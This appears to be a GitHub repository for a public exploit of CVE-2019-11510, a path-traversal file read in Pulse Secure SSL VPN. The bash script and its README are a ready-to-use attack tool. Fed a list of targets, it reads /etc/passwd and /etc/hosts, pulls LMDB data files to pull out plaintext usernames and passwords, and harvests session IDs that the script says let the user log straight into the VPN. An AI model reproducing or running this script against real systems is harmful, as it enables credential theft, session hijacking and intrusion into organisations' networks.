├── CVE-2019-11510.PNG
├── README.md
└── CVE-2019-11510.sh


/CVE-2019-11510.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Neo23x0/CVE-2019-11510/master/CVE-2019-11510.PNG


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2019-11510
 2 | Exploit for Arbitrary File Read on Pulse Secure SSL VPN (CVE-2019-11510)
 3 | 
 4 | You can use a single domain, either a list of domains. You must include https:// in front of the domain.
 5 | 
 6 | Usage : cat targetlist.txt | bash CVE-2019-11510.sh / bash CVE-2019-11510.sh -d https://vpn.target.com/
 7 | 
 8 | If you want to just verify the exploit and download /etc/passwd then use :  
 9 | 
10 | cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd
11 | 
12 | bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd
13 | 
14 | Output will be saved inside output/vpn.target.com/
15 | 
16 | Demo : 
17 | 
18 | ![CVE-2019-11510.sh demo](https://github.com/projectzeroindia/CVE-2019-11510/raw/master/CVE-2019-11510.PNG)
19 | 
20 | 
21 | Reference/Credits
22 | ---
23 | 
24 | https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
25 | 
26 | https://www.blackhat.com/us-19/briefings/schedule/index.html#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545
27 | 
28 | https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
29 | 
30 | https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
31 | 


--------------------------------------------------------------------------------
/CVE-2019-11510.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | # Usage : cat targetlist.txt | bash CVE-2019-11510.sh     /   bash CVE-2019-11510.sh -d https://vpn.target.com/
  3 | # If you want to just verify the exploit and download /etc/passwd then use :  cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd     /   bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd 
  4 | # You must have binutils installed, install it by apt-get install binutils
  5 | # Release Date : 21/08/2019
  6 | # Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
  7 | echo "=================================================================================
  8 |  ___             _           _     ____                 ___           _  _       
  9 | | _ \ _ _  ___  (_) ___  __ | |_  |_  / ___  _ _  ___  |_ _| _ _   __| |(_) __ _ 
 10 | |  _/| '_|/ _ \ | |/ -_)/ _||  _|  / / / -_)| '_|/ _ \  | | | ' \ / _' || |/ _' |
 11 | |_|  |_|  \___/_/ |\___|\__| \__| /___|\___||_|  \___/ |___||_||_|\__,_||_|\__,_|
 12 |               |__/                                                 CVE-2019-11510 
 13 | ================================================================================="
 14 | ##############################
 15 | if [ ! -d "output" ]; then
 16 |   mkdir "output";
 17 | fi
 18 | ##############################
 19 | while test $# -gt 0; do
 20 |            case "$1" in
 21 |                     -d)
 22 |                         shift
 23 |                         DOM=$1
 24 |                         shift
 25 |                         ;;
 26 | 					--only-etc-passwd)
 27 |                         shift
 28 |                         VER="yes"
 29 |                         shift
 30 |                         ;;
 31 |                 *)
 32 |                     break
 33 |                  ;;
 34 |           esac
 35 |   done
 36 | ##############################
 37 | function checkexp {
 38 | UR=$1
 39 | URL=${UR%/}
 40 | curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" > c.txt
 41 | RE=$(cat c.txt)
 42 | if [[ $RE == *"root:x:0:0:root"* ]]; then
 43 |   echo "$URL ---------------> Vulnerable"
 44 |   URLDOM=$(echo $URL | sed -e 's|^[^/]*//||' -e 's|/.*$||')
 45 |   if [ ! -d "output/$URLDOM" ]; then
 46 |     mkdir "output/$URLDOM";
 47 |   fi
 48 |   echo "Writing all files to output/$URLDOM/"
 49 |   echo Extracting /etc/passwd
 50 |   mv c.txt output/$URLDOM/etc_passwd
 51 |   echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 52 |   cat output/$URLDOM/etc_passwd
 53 |   echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 54 |   if [ -z "$VER" ]; then
 55 |   echo Extracting /etc/hosts
 56 |   curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" > output/$URLDOM/etc_hosts
 57 |   echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 58 |   cat output/$URLDOM/etc_hosts
 59 |   echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 60 |   echo Downloading /data/runtime/mtmp/lmdb/dataa/data.mdb to extract plaintext usernames and password
 61 |   curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb
 62 |   echo Extracting Usernames and Passwords from /data/runtime/mtmp/lmdb/dataa/data.mdb
 63 |   cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb | strings > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings
 64 |   cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | sed -z 's/\n/pzipzipzi/g' > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
 65 |   cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings | grep "cn=" | cut -d ',' -f1 | cut -d '=' -f2 > output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
 66 |   echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 67 |   while read -r line; do
 68 | 	ST=$line"pzipzipzipassword@2pzipzipzi"
 69 |     if grep -q $ST "output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod"; then	
 70 | 	LI="s/.*"$line"pzipzipzipassword@2pzipzipzi//;s/pzipzipzi.*//"
 71 | 	PASW=$(cat output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod | sed -e $LI)
 72 | 	echo "User : $line | Password : $PASW"
 73 | 	echo "User : $line | Password : $PASW" >> output/$URLDOM/plaintext_user_pass.txt
 74 | 	else
 75 | 	echo "User : $line | Password not found."
 76 | 	fi
 77 | 	done < output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.users
 78 | 	echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 79 | 	rm output/$URLDOM/data_runtime_mtmp_lmdb_dataa_data.mdb.strings.mod
 80 |   echo "Downloading /data/runtime/mtmp/lmdb/randomVal/data.mdb to extract sessionids, Use DSID=SESSIONID; as cookie to login directly into vpn"
 81 |   curl --path-as-is -s -k "$URL/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/" > output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb
 82 |   cat output/$URLDOM/data_runtime_mtmp_lmdb_randomVal_data.mdb | strings | grep randomVal | cut -b 10- | sort -u > output/$URLDOM/sessionids.txt
 83 |   echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 84 |   cat output/$URLDOM/sessionids.txt
 85 |   echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 86 | fi
 87 | else
 88 | rm c.txt
 89 | echo "$URL ---------------> Not Vulnerable"
 90 | fi
 91 | }
 92 | ##############################
 93 | if [ -z "$DOM" ]; then
 94 |   while read x
 95 |   do
 96 | checkexp $x
 97 |   done
 98 | else
 99 | checkexp $DOM
100 | fi
101 | 


--------------------------------------------------------------------------------